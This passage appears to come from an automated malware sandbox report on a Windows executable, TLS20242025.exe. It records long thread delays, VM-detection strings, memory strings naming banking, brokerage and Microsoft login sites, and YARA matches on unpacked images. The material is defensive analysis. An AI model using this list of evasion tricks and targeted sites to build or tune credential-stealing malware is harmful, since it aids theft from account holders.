Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599437 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599327 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599218 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599109 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599000 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598890 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598781 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598671 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598562 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598453 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598343 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598234 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598125 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598015 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597906 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597796 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597687 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597578 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597468 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597359 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597250 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597140 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597031 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596920 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596803 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596672 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596547 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596437 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596328 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596218 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596109 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596000 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595890 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595781 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595671 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595562 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595453 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595343 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595234 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595125 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595015 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594905 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594796 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594687 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594575 |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep count: 32 > 30 |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -29514790517935264s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -600000s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948 |
Thread sleep count: 1657 > 30 |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599875s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948 |
Thread sleep count: 8201 > 30 |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599765s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599656s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599546s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599437s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599327s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599218s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599109s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599000s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598890s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598781s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598671s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598562s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598453s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598343s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598234s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598125s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598015s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597906s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597796s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597687s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597578s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597468s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597359s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597250s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597140s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597031s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596920s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596803s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596672s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596547s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596437s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596328s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596218s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596109s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596000s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595890s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595781s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595671s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595562s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595453s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595343s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595234s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595125s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595015s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594905s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594796s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594687s >= -30000s |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594575s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 600000 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696487552u |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696487552f |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls>Q |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696487552} |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696487552o |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696487552d |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696487552j |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696487552] |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696487552t |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696487552s |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696487552t |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552} |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |